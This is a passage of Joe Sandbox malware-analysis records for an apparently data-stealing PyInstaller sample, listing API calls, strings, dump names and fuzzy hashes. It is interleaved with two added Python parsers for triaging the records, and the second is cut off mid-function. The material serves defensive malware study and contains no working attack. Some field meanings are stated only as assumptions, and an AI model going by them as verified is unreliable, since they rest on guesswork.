                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46219F32A0A7828AEB64BA25EC413BD22A0FF00F84F2C4435DB49423A9DE3CE841C651
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction ID: a84ba4a718ccd5eed1345ccf01100c65a9825216815a7ae7e20535eea5ef0b15
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D901C422E0C76580EA04DF5A99410B9A691BF85FE1F484631EF5C97FE6CE7CE4028300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF6B7506476,?,00007FF6B750336E), ref: 00007FF6B7508EA2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                                              • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                              • Instruction ID: d9a9c119947db750693d65ccc3b578e8df6d0c7b37b8cdcce64977254a4f18bc
• Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
• Instruction Fuzzy Hash: 3CD0C202F3825642EA48A76BBA46A795251AF89BC0F88D035EF4D43B6AEC3CD0414B00
APIs
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
• Instruction ID: 2c4080e693f30776634ba9d2c2f66456547a75d61390a7110f310b8cb6a3c1ec
• Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
• Instruction Fuzzy Hash: 0F217132B08B8187E7549B26A5446AEB2A5FB88B94F584135EB8D43FA9CF3CD451CB04
APIs
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
• Instruction ID: 4ba38de0d793e79f5433e7b1043c8941d3493797251b4406aec5e36ff450be78
• Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
• Instruction Fuzzy Hash: 16214D32E0A68685FB64BA25EC453B922E4FF41F54F2C8435DB0E467BDCE3CE9818651
APIs
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
• Instruction ID: 4327385b0712ee5e849ffcd87e15fdd6608e09e515c54a2d0011a2b376ab9afc
• Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
• Instruction Fuzzy Hash: D1F0FF22B09B8285E704AB16F8042AAA764FB99FC4F5C4035EF8E47BADCF3CD5518704
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF6B7510C90,?,?,?,00007FF6B75122FA,?,?,?,?,?,00007FF6B7513AE9), ref: 00007FF6B751D63A
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction ID: 03153f43d82c1e21f5ae14c97fc931c40e7c8e65b3e43365fdf77f0453d9abc4
• Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction Fuzzy Hash: 06F0F892F0DB9645FE645F79584167512905F847A2F080734DF2EC6AE2EE2CA880A610
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: 0f916afd0678db3eecd8a898f3a7dbc4401063a93fe515aea3663798724dcb29
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: 1AD15E33A0CB8686EB109F78E8546A93771FF94B58F400239DB9E96AB4DF3CE5458740
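The dump names cited in these records follow one dotted layout (process.run.dumpid.address.protection.flag.type.module.sdmp) and the function records themselves repeat a fixed set of labelled fields, so a triage script can read them mechanically instead of a human scrolling through thousands of near-identical entries. The block below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses records of this shape into structures, decodes each dump name, and groups the functions per module base, flagging any dumped region that is both writable and executable. Only the address field is self-evident from the report; the other field names, and the reading of the fifth and seventh fields as winnt.h PAGE_* and MEM_* constants, are assumptions that happen to agree with every value shown above (0x02 at each image base, 0x20 on program.exe's code, 0x40 on the 7FFE00760000 module's code, 0x04 on data, 0x01000000 throughout). The embedded SAMPLE is a constructed, abridged excerpt of the records above, with the "Download File" link residue left in on purpose so the parser is seen tolerating it.

```python
"""Added example (not from the Joe Sandbox report): parse the per-function records
above and decode the .sdmp memory-dump names they cite.  Field names other than the
address, and the PAGE_*/MEM_* reading of two fields, are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

PAGE_PROTECTION = {  # winnt.h values; ASSUMED meaning of the 5th dotted field
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x01000000: "MEM_IMAGE", 0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED"}  # ASSUMED 7th field

# proc.run.dumpid.address.protect.flag.memtype.module.sdmp (group names assumed; address self-evident)
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.(?P<dump_id>\d+)\.(?P<address>[0-9A-F]{16})\."
    r"(?P<protect>[0-9A-F]{8})\.(?P<flag>[0-9A-F]{8})\.(?P<memtype>[0-9A-F]{8})\.(?P<module>[0-9A-F]{8})\.sdmp$", re.I)
API_CALL_RE = re.compile(r"^(?P<api>[\w.]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$", re.I)


@dataclass
class Dump:
    address: int
    protect: str
    memtype: str
    module_index: int


def parse_sdmp(name: str) -> Dump:
    """Decode one dump file name; trailing 'Download File' link residue is tolerated."""
    m = SDMP_RE.match(name.strip().removesuffix("Download File").strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    prot, mtype = int(m["protect"], 16), int(m["memtype"], 16)
    return Dump(int(m["address"], 16), PAGE_PROTECTION.get(prot, hex(prot)),
                MEM_TYPE.get(mtype, hex(mtype)), int(m["module"], 16))


@dataclass
class FunctionRecord:
    module_base: int = 0
    dumps: list = field(default_factory=list)
    api_calls: list = field(default_factory=list)  # resolved imports, e.g. HeapAlloc.KERNEL32
    api_id: str = ""                               # Joe Sandbox's mangled API token list
    strings: list = field(default_factory=list)    # '$'-separated String ID tokens


def parse_listing(text: str) -> list:
    """One FunctionRecord per 'APIs' heading; bullets and indentation are ignored."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("Source File:"):
            name, _, rest = line[len("Source File:"):].partition(",")
            cur.dumps.append(parse_sdmp(name))
            cur.module_base = int(re.search(r"Offset: ([0-9A-F]+)", rest, re.I)[1], 16)
        elif line.startswith("Associated:"):
            cur.dumps.append(parse_sdmp(line[len("Associated:"):]))
        elif line.startswith("API ID:"):
            cur.api_id = line[len("API ID:"):].strip()
        elif line.startswith("String ID:"):
            cur.strings = [s for s in line[len("String ID:"):].strip().split("$") if s]
        elif (m := API_CALL_RE.match(line)):
            cur.api_calls.append(m["api"])
    return records


def summarize(records: list) -> dict:
    """Per module base: function count, imports, strings, and dumped regions that are
    writable *and* executable (the first place to look in a packed sample)."""
    out = defaultdict(lambda: {"functions": 0, "apis": set(), "strings": set(), "rwx": set()})
    for r in records:
        m = out[r.module_base]
        m["functions"] += 1
        m["apis"].update(r.api_calls)
        m["strings"].update(r.strings)
        m["rwx"].update(d.address for d in r.dumps if d.protect == "PAGE_EXECUTE_READWRITE")
    return dict(out)


# Constructed, abridged excerpt of the records above (link residue deliberately kept).
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
• Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
Similarity
• API ID: ErrorLast
• String ID:
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF6B7510C90,?,?,?,00007FF6B75122FA,?,?,?,?,?,00007FF6B7513AE9), ref: 00007FF6B751D63A
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: AllocHeap
APIs
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
Similarity
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
"""
```

Running `summarize(parse_listing(SAMPLE))` on the excerpt yields two module groups: program.exe at 0x7FF6B7500000 (two functions, one resolved import, the PyInstaller onefile bootloader strings, no writable code) and the module at 0x7FFE00760000 whose dumped code region at 0x7FFE00761000 is PAGE_EXECUTE_READWRITE under the assumed decoding. Feed the real listing in and the same grouping tells you which module bases carry the interesting strings and which regions to pull from the downloadable dumps first.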
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
• Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
Similarity
• API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                              • API String ID: 4225454184-1067337024
                                                                                                                                                                                                                                              • Opcode ID: c8a2246b974823a7f9e685c92d7b6b5ea85889c004ad0ed30654c43bd33b2973
                                                                                                                                                                                                                                              • Instruction ID: a962de5e5fe5605f3530c14e721a8488ce97ccc49c9daab3728decf95bf8bc12
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a2246b974823a7f9e685c92d7b6b5ea85889c004ad0ed30654c43bd33b2973
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0022462E0C68685FF758B2494603797BD1AF62BA4F164235CAAE4B6F1DE3DE441C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116507686.00007FFDFAE60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEAA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEB8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A461ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2528831389-0
                                                                                                                                                                                                                                              • Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                              • Instruction ID: a5bc5b172a924cd8e100a5a6971bdeb98b6e9290a7bad0a6227e8595d42127a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D316D72728B8286EB68AF60E8607ED7360FB94744F00443ADA5E47B99DF39C548CB00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B750842B
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084AE
                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084CD
                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084DB
                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084EC
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084F5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction ID: 357850099f2e1e2cd68665016846c1d9ce0cd1ccdab5cdcc1ad199b6742cb407
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1416023E0CA8695EA209F28E4445FA63A0FB9475CF500236EB9DD36E4EF3CE549C741
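The records above are the raw per-function output of the Joe Sandbox IDA plugin: each function in a dumped module gets an API ID, a String ID and two fuzzy hashes that can be pivoted on across reports. The function at 00007FF6B7508xxx in program.exe is a good illustration of what the fields encode: FindFirstFileW on a "%s\*" pattern, DeleteFileW and RemoveDirectoryW inside a FindNextFileW loop, then RemoveDirectoryW on the parent is the shape of a delete-whole-directory routine. The strings in the 00007FFE01300000 module ("no such vfs: %s", "invalid uri authority: %.*s", the "0123456789ABCDEF0123456789abcdef" digit table) are the wording SQLite uses in its URI parser and printf implementation, which matches the browser-database theft verdicts in the report summary. The following is an added example, not code from the report or from Joe Sandbox: a parser that turns records in this layout into dictionaries, orders the API calls by their reference address, flags the delete-tree pattern, and indexes records by Opcode ID so the hash can be looked up in other reports. The sample text is constructed from two of the records on this page (abridged). It assumes, from the visible `Offset:` values, that the fourth dot-separated field of a `.sdmp` name is the dumped region's virtual address; the "Download File" text fused onto some `Associated:` lines is treated as page residue and stripped.

```python
"""Parse Joe Sandbox per-function 'Similarity' records into dicts for pivoting."""
import re
from typing import Dict, List, Optional

# Constructed sample: two records in the page's own layout (abridged, not a full report).
SAMPLE = r"""
APIs
• FindFirstFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B750842B
• RemoveDirectoryW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084AE
• DeleteFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084CD
• FindNextFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084DB
• FindClose.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084EC
• RemoveDirectoryW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084F5
Strings
Memory Dump Source
• Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
• Instruction Fuzzy Hash: D1416023E0CA8695EA209F28E4445FA63A0FB9475CF500236EB9DD36E4EF3CE549C741
Strings
Memory Dump Source
• Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
Similarity
• API ID:
• String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
• API String ID: 0-2031831958
• Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
• Instruction Fuzzy Hash: EDD12662B1D68286EB668B59D064B7D7BE5FB44B80F4B4078DE8E4B7A5DE2CE400C700
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^(?P<dump>\S+\.sdmp), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)$")
KEY_MAP = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
           "Opcode ID": "opcode_id", "Instruction ID": "instruction_id", "Snapshot File": "snapshot",
           "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}


def _new_record() -> Dict:
    return {"apis": [], "associated": [], "source_file": None, "module_base": None,
            "based_on_pe": None, **{v: "" for v in KEY_MAP.values()}}


def parse_records(text: str) -> List[Dict]:
    """Split the flat listing into one dict per function; a record ends at its Instruction Fuzzy Hash."""
    records, rec, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            continue
        if not line.startswith("•"):
            continue                      # blank lines and page residue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                rec["apis"].append({"func": m["func"], "module": m["mod"],
                                    "args": m["args"].split(","), "ref": int(m["ref"], 16)})
            continue
        key, _, value = body.partition(":")   # first colon only: String IDs contain colons
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m = SOURCE_RE.match(value)
            if m:
                rec["source_file"], rec["module_base"] = m["dump"], int(m["base"], 16)
                rec["based_on_pe"] = m["pe"] == "true"
        elif key == "Associated":
            rec["associated"].append(value.replace("Download File", "").strip())
        elif key in KEY_MAP:
            rec[KEY_MAP[key]] = value
            if key == "Instruction Fuzzy Hash":  # last field of every record
                records.append(rec)
                rec = _new_record()
    if rec["opcode_id"]:                  # keep a truncated trailing record if it has an ID
        records.append(rec)
    return records


def api_sequence(rec: Dict) -> List[str]:
    """API names in code order (by the 'ref' address of each call site)."""
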